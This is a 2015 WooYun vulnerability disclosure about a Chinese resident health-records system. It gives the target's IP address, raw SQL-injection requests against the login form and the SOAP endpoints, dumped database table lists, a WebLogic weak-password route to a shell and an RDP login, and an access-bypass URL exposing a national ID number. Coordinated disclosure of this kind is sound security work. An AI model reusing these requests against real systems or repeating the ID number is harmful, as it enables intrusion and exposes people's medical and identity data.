某城乡居民健康档案管理系统SQL注入35个库DBA权限+Weblogic弱口令+用户信息越权访问(涉及几百万用户信息)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117247

漏洞标题：某城乡居民健康档案管理系统SQL注入35个库DBA权限+Weblogic弱口令+用户信息越权访问(涉及几百万用户信息)

漏洞作者：几何黑店

提交时间：2015-05-31 12:41

修复时间：2015-07-19 15:20

公开时间：2015-07-19 15:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-31：细节已通知厂商并且等待厂商处理中
2015-06-04：厂商已经确认，细节仅向厂商公开
2015-06-14：细节向核心白帽子及相关领域专家公开
2015-06-24：细节向普通白帽子公开
2015-07-04：细节向实习白帽子公开
2015-07-19：细节向公众公开

简要描述：

某城乡居民健康档案管理系统SQL注入35个库+Weblogic弱口令+用户信息越权访问(涉及几百万用户信息)

详细说明：

http://202.100.78.91:7001/jkda
登陆框注入

POST /jkda/LoginAction.do HTTP/1.1
Host: 202.100.78.91:7001
Content-Length: 29
Accept: */*
Origin: http://202.100.78.91:7001
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://202.100.78.91:7001/jkda/login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=B549DCD7A115943BD28824A24963658C
X-dotNet-Beautifier: 1; DO-NOT-REMOVE
userCode=admin&userPass=admin

参数:userCode和userPass

Database: JINCHANG_TEST1
[467 tables]
+-------------------------------+
| AAA                           |
| AA_A                          |
| CV0100_01                     |
| CV0100_02                     |
| CV0100_03                     |
| CV0100_04                     |
| CV0207_01                     |
| CV0209_01                     |
| CV0218_01                     |
| CV0218_02                     |
| CV0218_03                     |
| CV0299_01                     |
| CV0300_01                     |
| CV0400_01                     |
| CV2101_01                     |
| CV2101_02                     |
| CV3000_01                     |
| CV4202_01                     |
| CV4202_02                     |
| CV4202_03                     |
| CV4202_04                     |
| CV4202_05                     |
| CV4203_01                     |
| CV5101_01                     |
| CV5101_02                     |
| CV5101_03                     |
| CV5101_04                     |
| CV5101_05                     |
| CV5101_06                     |
| CV5101_07                     |
| CV5101_08                     |
| CV5101_09                     |
| CV5101_10                     |
| CV5101_11                     |
| CV5101_12                     |
| CV5101_13                     |
| CV5101_14                     |
| CV5101_15                     |
| CV5101_16                     |
| CV5101_17                     |
| CV5101_18                     |
| CV5101_19                     |
| CV5101_20                     |
| CV5101_21                     |
| CV5101_22                     |
| CV5101_23                     |
| CV5101_24                     |
| CV5101_25                     |
| CV5101_26                     |
| CV5101_27                     |
| CV5101_28                     |
| CV5101_29                     |
| CV5101_30                     |
| CV5101_31                     |
| CV5101_32                     |
| CV5101_33                     |
| CV5101_34                     |
| CV5102_01                     |
| CV5102_02                     |
| CV5102_03                     |
| CV5102_04                     |
| CV5102_05                     |
| CV5102_06                     |
| CV5102_07                     |
| CV5102_08                     |
| CV5102_09                     |
| CV5102_10                     |
| CV5103_01                     |
| CV5103_02                     |
| CV5103_03                     |
| CV5103_04                     |
| CV5103_05                     |
| CV5103_06                     |
| CV5103_07                     |
| CV5105_01                     |
| CV5105_02                     |
| CV5201_01                     |
| CV5201_02                     |
| CV5201_03                     |
| CV5201_04                     |
| CV5201_05                     |
| CV5201_07                     |
| CV5201_076                    |
| CV5201_08                     |
| CV5201_09                     |
| CV5201_10                     |
| CV5201_11                     |
| CV5201_12                     |
| CV5201_13                     |
| CV5201_14                     |
| CV5201_15                     |
| CV5201_16                     |
| CV5201_17                     |
| CV5201_18                     |
| CV5201_20                     |
| CV5201_21                     |
| CV5201_22                     |
| CV5202_01                     |
| CV5202_02                     |
| CV5202_03                     |
| CV5202_04                     |
| CV5202_05                     |
| CV5202_06                     |
| CV5202_07                     |
| CV5202_08                     |
| CV5202_09                     |
| CV5202_10                     |
| CV5202_11                     |
| CV5202_12                     |
| CV5301_02                     |
| CV5301_03                     |
| CV5301_04                     |
| CV5303_01                     |
| CV5304_01                     |
| CV5305_01                     |
| CV5305_02                     |
| CV5305_03                     |
| CV5399_01                     |
| CV5401_01                     |
| CV5401_02                     |
| CV5402_01                     |
| CV5402_02                     |
| CV5402_03                     |
| CV5402_04                     |
| CV5402_05                     |
| CV5501_01                     |
| CV5501_02                     |
| CV5501_03                     |
| CV5501_04                     |
| CV5501_05                     |
| CV5501_06                     |
| CV5501_07                     |
| CV5501_08                     |
| CV5501_10                     |
| CV5502_01                     |
| CV5502_02                     |
| CV5502_03                     |
| CV5502_04                     |
| CV5502_05                     |
| CV5502_06                     |
| CV5502_07                     |
| CV5502_08                     |
| CV5502_09                     |
| CV5502_10                     |
| CV5502_11                     |
| CV5502_12                     |
| CV5502_13                     |
| CV5502_14                     |
| CV5502_15                     |
| CV5502_16                     |
| CV5502_17                     |
| CV5600_01                     |
| CV5600_02                     |
| CV5600_03                     |
| CV5600_04                     |
| CV8500_01                     |
| CV8500_02                     |
| CV8500_03                     |
| CV8500_05                     |
| CV8600_01                     |
| CV8600_02                     |
| CV8600_03                     |
| CV8700_01                     |
| CV8700_02                     |
| CV8800_01                     |
| CV8800_02                     |
| CV8800_03                     |
| CV8900_01                     |
| CV8900_02                     |
| CV8900_03                     |
| CV8900_04                     |
| CV8900_05                     |
| CV8900_06                     |
| CV8900_07                     |
| CV8900_08                     |
| CV8900_09                     |
| CV9000_01                     |
| CV9100_01                     |
| CV9100_02                     |
| CV9100_03                     |
| CV9100_05                     |
| CV9100_06                     |
| CV9100_07                     |
| CV9100_08                     |
| CV9100_09                     |
| CV9100_10                     |
| CV9100_11                     |
| CV9100_12                     |
| CV9100_13                     |
| CV9200_01                     |
| CV9200_02                     |
| CV9200_03                     |
| CV9200_04                     |
| CV9200_05                     |
| CV9200_06                     |
| CV9200_07                     |
| CV9300_01                     |
| D101                          |
| D101_620621                   |
| D201                          |
| D201_620621                   |
| D301                          |
| D301_620621                   |
| D401                          |
| D401_1                        |
| D401_620621                   |
| D501                          |
| D501_620621                   |
| D502                          |
| D502_620621                   |
| D503                          |
| D503_620621                   |
| HR_BUDGETMANAGER              |
| HR_BUDGETMANAGER_620621       |
| HR_DEATH_STATE                |
| HR_DEATH_STATE_620621         |
| HR_HEALTH_METHOD              |
| HR_HEALTH_METHOD_620621       |
| HR_PERSON                     |
| HR_PERSON_620621              |
| HR_PERSON_CHECK               |
| HR_PERSON_CHECK_620621        |
| HR_PERSON_CHECK_LIST          |
| HR_PERSON_CHECK_LIST_620621   |
| HR_PERSON_FAMILY              |
| HR_PERSON_FAMILY_620621       |
| HS_ACCEPTS_RECORD             |
| HS_ACCEPTS_RECORD_620621      |
| HS_BABY_FAMILY_VISIT          |
| HS_BABY_FAMILY_VISIT_620621   |
| HS_BABY_VISIT2                |
| HS_BABY_VISIT2_620621         |
| HS_BABY_VISIT3                |
| HS_BABY_VISIT3_620621         |
| HS_BABY_VISIT4                |
| HS_BABY_VISIT4_620621         |
| HS_BABY_VISIT5                |
| HS_BABY_VISIT5_620621         |
| HS_BABY_VISIT6                |
| HS_BABY_VISIT6_620621         |
| HS_BABY_VISIT7                |
| HS_BABY_VISIT7_620621         |
| HS_BABY_VISIT_SCHOOL          |
| HS_BABY_VISIT_SCHOOL_620621   |
| HS_BRAIN_REGISTER             |
| HS_BRAIN_REGISTER_620621      |
| HS_BRAIN_VISIT                |
| HS_BRAIN_VISIT_620621         |
| HS_CONSULTATION_RECORD        |
| HS_CONSULTATION_RECORD_620621 |
| HS_CORONARY_REGISTER          |
| HS_CORONARY_REGISTER_620621   |
| HS_CORONARY_VISIT             |
| HS_CORONARY_VISIT_620621      |
| HS_DIABETES_VISIT             |
| HS_DIABETES_VISIT_620621      |
| HS_DOCTOR                     |
| HS_DOCTOR_620621              |
| HS_FJH_VISIT                  |
| HS_FJH_VISIT_620621           |
| HS_GRAVIDA_VISIT1             |
| HS_GRAVIDA_VISIT1_620621      |
| HS_GRAVIDA_VISIT2             |
| HS_GRAVIDA_VISIT2_620621      |
| HS_GRAVIDA_VISIT3             |
| HS_GRAVIDA_VISIT3_620621      |
| HS_GRAVIDA_VISIT4             |
| HS_GRAVIDA_VISIT4_620621      |
| HS_GROUP                      |
| HS_GROUP_620621               |
| HS_GROUP_ITEMS                |
| HS_GROUP_ITEMS_620621         |
| HS_GROUP_LIST                 |
| HS_HEALTHTEACH_FILE           |
| HS_HEALTHTEACH_RECORD         |
| HS_HEALTHTEACH_RECORD_620621  |
| HS_HYPERTENSION_VISIT         |
| HS_HYPERTENSION_VISIT_620621  |
| HS_ITEM                       |
| HS_ITEM_620621                |
| HS_ITEM_LIST                  |
| HS_ITEM_LIST_620621           |
| HS_JSBHZXXBC                  |
| HS_JSBHZXXBC_620621           |
| HS_JSFLZ_VISIT                |
| HS_LUNACY_VISIT               |
| HS_LUNACY_VISIT_620621        |
| HS_OFFICES                    |
| HS_OFFICES_620621             |
| HS_PNEUMONIA_REGISTER         |
| HS_PNEUMONIA_REGISTER_620     |
| HS_PNEUMONIA_VISIT            |
| HS_PNEUMONIA_VISIT_620        |
| HS_STROKE_REGISTER            |
| HS_STROKE_REGISTER_620621     |
| HS_STROKE_VISIT               |
| HS_STROKE_VISIT_620621        |
| HS_TURNOUT_RECORD             |
| HS_TURNOUT_RECORD_620621      |
| HS_TURNRETURN_RECORD          |
| HS_TURNRETURN_RECORD_620621   |
| HS_VACCINATIONCARD_RECORD     |
| HS_VACCINATIONCARD_RECORD_620 |
| JINCHANG_TEST1TZ_LOG          |
| S101_01                       |
| S101_02                       |
| S101_03                       |
| S101_04                       |
| S101_05                       |
| S101_06                       |
| S101_07                       |
| S101_10                       |
| S101_11                       |
| S101_12                       |
| S101_13                       |
| S201_01_01                    |
| S201_01_02                    |
| S201_01_03                    |
| S201_01_04                    |
| S201_02                       |
| S201_04                       |
| S201_06                       |
| S301_01                       |
| S301_07                       |
| S701_01                       |
| SYS_EXPORT_SCHEMA_01          |
| SYS_EXPORT_SCHEMA_02          |
| TB_AREA                       |
| TB_BABY_MOLD                  |
| TB_BABY_SETTING               |
| TB_BABY_SETTING_620621        |
| TB_CHGL_RYHZ                  |
| TB_CHGL_RYHZ_620621           |
| TB_CHGL_RYHZ_SUM              |
| TB_CHGL_RYHZ_SUM_620621       |
| TB_CYZX                       |
| TB_CYZX_620621                |
| TB_D401_DISEASE               |
| TB_D401_DISEASE_620621        |
| TB_DEPARTMEMT_INFO            |
| TB_DEPARTMEMT_INFO_620621     |
| TB_DIAGNOSE_INFO              |
| TB_DIAGNOSE_INFO_620621       |
| TB_DISEASE_CARD               |
| TB_DISEASE_MOLD               |
| TB_DISEASE_SETTING            |
| TB_DISEASE_SETTING_620621     |
| TB_FACTORY_YMTYPE             |
| TB_FAMILY_STATUS              |
| TB_HEALTHARCHIVES_620621      |
| TB_HEALTHARCHIVES_REPORT      |
| TB_HEALTH_ELSEINFO            |
| TB_HJXGREPORT                 |
| TB_HJXGREPORT_620621          |
| TB_JIEZHONG_TOTAL             |
| TB_JIEZHONG_TOTAL_620621      |
| TB_JTZX                       |
| TB_JTZX_620300                |
| TB_JTZX_620621                |
| TB_LNRHZ_COUNT                |
| TB_LNRHZ_COUNT_620621         |
| TB_MODULE                     |
| TB_MXB_REPORT                 |
| TB_MXB_REPORT_620621          |
| TB_NEW_DISEASEVISIT           |
| TB_NEW_DISEASEVISIT_620621    |
| TB_NOT_CONDITIONS             |
| TB_NOT_CONDITIONS_620621      |
| TB_OLDEVALUATE                |
| TB_OLDEVALUATE_620300         |
| TB_OLDEVALUATE_620621         |
| TB_PERFORMANCE_CHECK          |
| TB_PERFORMANCE_CHECK_620621   |
| TB_PERSON_CHECK_ID            |
| TB_PERSON_CHECK_ID_620621     |
| TB_PERSON_TOTALCOUNT          |
| TB_PERSON_TOTALCOUNT_620621   |
| TB_REPLY_HOSPITAL             |
| TB_REPLY_HOSPITAL_620621      |
| TB_REPLY_OUTPATIENT           |
| TB_REPLY_OUTPATIENT_620621    |
| TB_REPORT_HEALTH_SERVICE      |
| TB_REPORT_HEALTH_SERVICE_TEMP |
| TB_REPORT_JXKH_BABY           |
| TB_REPORT_JXKH_BABY_620621    |
| TB_REPORT_JXKH_DISEASE        |
| TB_REPORT_JXKH_DISEASE_620621 |
| TB_REPORT_JXKH_YCF            |
| TB_REPORT_JXKH_YCF_620621     |
| TB_REPORT_PLAN_SERVICE        |
| TB_REPORT_SERVICE_620621      |
| TB_REPORT_TITLE               |
| TB_REPORT_TITLE_LIST          |
| TB_REPORT_USER_SET            |
| TB_REPORT_ZD                  |
| TB_REPORT_ZD_LIST             |
| TB_REPORT_ZD_LIST_620621      |
| TB_REPORT_ZD_LIST_NEW         |
| TB_REPORT_ZD_LIST_NEW_620621  |
| TB_REQUEST_SET                |
| TB_REQUEST_SET_SEC            |
| TB_REQUEST_SQBG               |
| TB_REQUEST_SQBG_620621        |
| TB_REVIEW_STANDARD_620621     |
| TB_ROLE                       |
| TB_ROLE_PRI                   |
| TB_SPRNAREAPEOPLE             |
| TB_SPRNAREAPEOPLE_620621      |
| TB_SYSTEM_PARAMETER           |
| TB_SYSTEM_PARAMETER_620621    |
| TB_TOTALNUM_HZINFO            |
| TB_TOTALNUM_HZINFO_620621     |
| TB_TOTAL_TEMP                 |
| TB_TOTAL_TEMP_620621          |
| TB_TURNINFO_MOLD              |
| TB_TURNINFO_SETTING           |
| TB_USER_INFO                  |
| TB_USER_PRI                   |
| TB_USER_ROLE                  |
| TB_VACCINE_BATCH              |
| TB_VACCINE_BATCH_620621       |
| TB_VACCINE_FACTORY            |
| TB_VACCINE_FACTORY_620621     |
| TB_VACCINE_PLACE              |
| TB_VACCINE_PLACE_620621       |
| TB_WARN_INFO                  |
| TB_WARN_LOG                   |
| TB_WARN_LOG_620621            |
| TB_XXCJ_COUNT                 |
| TB_XXCJ_COUNT_620621          |
| TB_XXCJ_COUNT_SUM             |
| TB_XXCJ_COUNT_SUM_620621      |
| TB_XXCJ_D101                  |
| TB_XXCJ_D101_620621           |
| TB_XXCJ_D101_SUM              |
| TB_XXCJ_D101_SUM_620621       |
| TB_YCF_MOLD                   |
| TB_YCF_SETTING                |
| TB_YCF_SETTING_620621         |
| TB_YMTYPE                     |
| TB_YMTYPE_620621              |
| TB_YPDWWH                     |
| TB_YPDWWH1                    |
| TB_ZCTJ_MATERIAL              |
| TB_ZJHZ_COUNT                 |
| TB_ZJHZ_COUNT_620621          |
| TB_ZJHZ_COUNT_SUM             |
| TB_ZJHZ_COUNT_SUM_620621      |
| TB_ZJHZ_D101                  |
| TB_ZJHZ_D101_620621           |
| TEMP_REPORT_RYHZ              |
| TEMP_REPORT_RYHZ_620621       |
| TS_PERSON                     |
| TZ_LOG                        |
| YC_BYCS                       |
| YC_GJASC                      |
| YC_HJ                         |
| YC_JSSS                       |
| YC_LASC_FKJC                  |
| YC_LASC_JBXX                  |
| YC_MAIN                       |
| YC_RXASC                      |
| YC_YQJC                       |
| YC_YSJL                       |
| YOANG_MAIN                    |
| YQANG_SLSC                    |
| YQANG_XXS                     |
+-------------------------------+

Database: MZJZ
[194 tables]
+------------------------------+
| AA                           |
| BCQS_ZYFP                    |
| D101                         |
| D201                         |
| D301                         |
| D302                         |
| D303                         |
| D304                         |
| D401                         |
| D402                         |
| D403                         |
| D404                         |
| D501                         |
| D502                         |
| D503                         |
| D504                         |
| D505                         |
| D506                         |
| D507                         |
| D601                         |
| D602                         |
| D603                         |
| D604                         |
| D701                         |
| D702                         |
| D_AREA                       |
| FAMILY_MEMBER_NO             |
| F_APPEND_FUNCTION            |
| F_BASE_FUNCTION              |
| GW                           |
| JBTJ                         |
| JBTJ_TMP                     |
| PBCATCOL                     |
| PBCATEDT                     |
| PBCATFMT                     |
| PBCATTBL                     |
| PBCATVLD                     |
| PLAN_TABLE                   |
| Q100                         |
| Q200                         |
| Q300                         |
| Q400                         |
| Q500                         |
| Q600                         |
| Q700                         |
| S101_01                      |
| S101_02                      |
| S101_03                      |
| S101_04                      |
| S101_05                      |
| S101_06                      |
| S101_07                      |
| S101_08                      |
| S101_09                      |
| S101_10                      |
| S101_11                      |
| S101_12                      |
| S101_13                      |
| S201_01_01                   |
| S201_01_02                   |
| S201_01_03                   |
| S201_01_04                   |
| S201_02                      |
| S201_03                      |
| S201_04                      |
| S201_05                      |
| S201_06                      |
| S301_01                      |
| S301_02                      |
| S301_03                      |
| S301_04                      |
| S301_05                      |
| S301_06                      |
| S301_07                      |
| S301_09                      |
| S301_10                      |
| S401_01                      |
| S401_02                      |
| S401_03                      |
| S401_04                      |
| S401_05                      |
| S401_06                      |
| S401_07                      |
| S401_08                      |
| S401_09                      |
| S401_10                      |
| S401_11                      |
| S501_01                      |
| S501_01_201204               |
| S501_01_20131022             |
| S501_01_TEMP                 |
| S601_01                      |
| S701_01                      |
| STUDENT                      |
| S_DOCTOR_DICT                |
| T101                         |
| T102                         |
| T103                         |
| T104                         |
| T105                         |
| T106                         |
| T107                         |
| T201                         |
| T202                         |
| T203                         |
| T204                         |
| T205                         |
| T206                         |
| T207                         |
| T401                         |
| TA_COUNT_MEM                 |
| TB_401_21_REMO               |
| TB_50                        |
| TB_51                        |
| TB_52                        |
| TB_531                       |
| TB_532                       |
| TB_533                       |
| TB_54                        |
| TB_AREA                      |
| TB_BCQS_DEP                  |
| TB_BCQS_DEP_JZDW             |
| TB_BCQS_DEP_ZFDW             |
| TB_BCQS_HOSP                 |
| TB_BCZF_REPORT               |
| TB_BLUSH_HOSP                |
| TB_BOOK_CARD_STATE_DICT      |
| TB_CYZX                      |
| TB_D101_JB                   |
| TB_DB_LIST                   |
| TB_DD_FLAG_HOSP              |
| TB_DEPARTMEMT_INFO           |
| TB_DIAGNOSIS_NAME_ANALYSIS   |
| TB_DIAGNOS_ANALYSIS          |
| TB_DISEASE_REDEEM            |
| TB_DISEASE_REDEEM_JB         |
| TB_DWGG                      |
| TB_FAMILY_STATUS             |
| TB_GRAPH                     |
| TB_GRAPH_EXAMPLE             |
| TB_GRAPH_LIST                |
| TB_IDENTITY_DICT             |
| TB_IMP                       |
| TB_JJSJCJ                    |
| TB_JJYJ                      |
| TB_JJYJ_ZDY                  |
| TB_JJYSJC                    |
| TB_JJZC                      |
| TB_JJZCQK                    |
| TB_JTZX                      |
| TB_MODULE                    |
| TB_NEWS                      |
| TB_NEWSTYPE                  |
| TB_NLQJTJ                    |
| TB_PARAMETER                 |
| TB_PIPELINE                  |
| TB_PRICE_LIST_LIMIT          |
| TB_PRICE_SCALE               |
| TB_REPORT_APPROPRIATION      |
| TB_REPORT_APPROPRIATION_TEMP |
| TB_REPORT_MZTJYB_DEP         |
| TB_REPORT_MZTJYB_XZ          |
| TB_REPORT_TITLE              |
| TB_REPORT_TITLE_LIST         |
| TB_REPORT_TJYB_DEP           |
| TB_REPORT_TJYB_ILEVEL        |
| TB_REPORT_TJYB_XZ            |
| TB_REPORT_USER_SET           |
| TB_ROLE                      |
| TB_ROLE_PRI                  |
| TB_RPT_ANALYSIS              |
| TB_RPT_BYSICK1               |
| TB_RPT_BYSICK3               |
| TB_S501_01                   |
| TB_S501_01_LIMIT             |
| TB_SUB_UNITS                 |
| TB_SYSTEM_PARAMETER          |
| TB_TABLE_INFO                |
| TB_TRANS                     |
| TB_UNI_PRO_DICT              |
| TB_UNI_PRO_MZ_DICT           |
| TB_USER_INFO                 |
| TB_USER_INFO_TEMP            |
| TB_USER_PRI                  |
| TB_USER_ROLE                 |
| TB_XZZYBZ_REPORT             |
| TB_XZZYFX                    |
| TEST                         |
| TEST_IMG                     |
| TZ_LOG                       |
| T_JJYJ_YLJG                  |
| T_ZYBXTJ                     |
| U_USER_TYPE                  |
| YZ_JCXX                      |
+------------------------------+

越权访问

http://202.100.78.91:7001/jkda/daxx/person.jsp?area_code=620621&ylzh=&grbh=&sfzh=622322196212122632

漏洞证明：

weblogic 弱口令可部署war文件包getshell
http://202.100.78.91:7003/console/

服务器还开了3389,上传SHELL以后还可直接添加用户登录3389
查看文件目录后,发现还有相同的程序登陆框均存在SQL注入(包括但不限于)
http://202.100.78.91:7001/renewal/
http://202.100.78.91:7001/mzjzml/
http://202.100.78.91:7001/sjpt/
http://202.100.78.91:7001/mzjzan/
http://202.100.78.91:7001/mzjz/
http://202.100.78.91:7001/gsdb/
去百度搜一下IP看看

发现还有wsdl,同样存在4处注入
http://202.100.78.91:7001/sjpt_his_village/Data_Update_M.ws?WSDL

POST /sjpt_his_village/Data_Update_M.ws HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 581
Referer: http://202.100.78.91:7001/sjpt_his_village/Data_Update_M.ws?WSDL
Host: 202.100.78.91:7001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://Data_Update.sjpt">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:Get_Is_Sk>
           <urn:in0>1&apos;&quot;</urn:in0>
           <urn:in1>1</urn:in1>
        </urn:Get_Is_Sk>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

参数:<urn:in0>1'"</urn:in0>

POST /sjpt_his_village/Data_Update_M.ws HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 591
Referer: http://202.100.78.91:7001/sjpt_his_village/Data_Update_M.ws?WSDL
Host: 202.100.78.91:7001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://Data_Update.sjpt">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:Get_Is_Hops_Sk>
           <urn:in0>1&apos;&quot;</urn:in0>
           <urn:in1>1</urn:in1>
        </urn:Get_Is_Hops_Sk>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

参数:<urn:in0>1'"</urn:in0>

POST /sjpt_his_village/Data_Update_M.ws HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 581
Referer: http://202.100.78.91:7001/sjpt_his_village/Data_Update_M.ws?WSDL
Host: 202.100.78.91:7001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://Data_Update.sjpt">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:GetYljgjb>
           <urn:in0>1&apos;&quot;</urn:in0>
           <urn:in1>1</urn:in1>
        </urn:GetYljgjb>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

参数:<urn:in0>1'"</urn:in0>

POST /sjpt_his_village/Data_Update_M.ws HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 640
Referer: http://202.100.78.91:7001/sjpt_his_village/Data_Update_M.ws?WSDL
Host: 202.100.78.91:7001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25
Accept: */*
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://Data_Update.sjpt">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:Find_Member1>
           <urn:in0>
             <urn:string>1&apos;&quot;</urn:string>
           </urn:in0>
           <urn:in1>1</urn:in1>
        </urn:Find_Member1>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

参数:<urn:string>1'"</urn:string>

修复方案：

你懂的

版权声明：转载请注明来源几何黑店@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-06-04 15:18

厂商回复：

CNVD确认并复现所述漏洞情况，已经转由CNCERT下发给甘肃分中心，由甘肃分中心后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117247

漏洞标题：某城乡居民健康档案管理系统SQL注入35个库DBA权限+Weblogic弱口令+用户信息越权访问(涉及几百万用户信息)

相关厂商：城乡居民健康档案管理系统

漏洞作者：几何黑店

提交时间：2015-05-31 12:41

修复时间：2015-07-19 15:20

公开时间：2015-07-19 15:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源几何黑店@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0117247

漏洞标题：某城乡居民健康档案管理系统SQL注入35个库DBA权限+Weblogic弱口令+用户信息越权访问(涉及几百万用户信息)

相关厂商：城乡居民健康档案管理系统

漏洞作者： 几何黑店

提交时间：2015-05-31 12:41

修复时间：2015-07-19 15:20

公开时间：2015-07-19 15:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0117247"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 几何黑店@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：几何黑店

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源几何黑店@乌云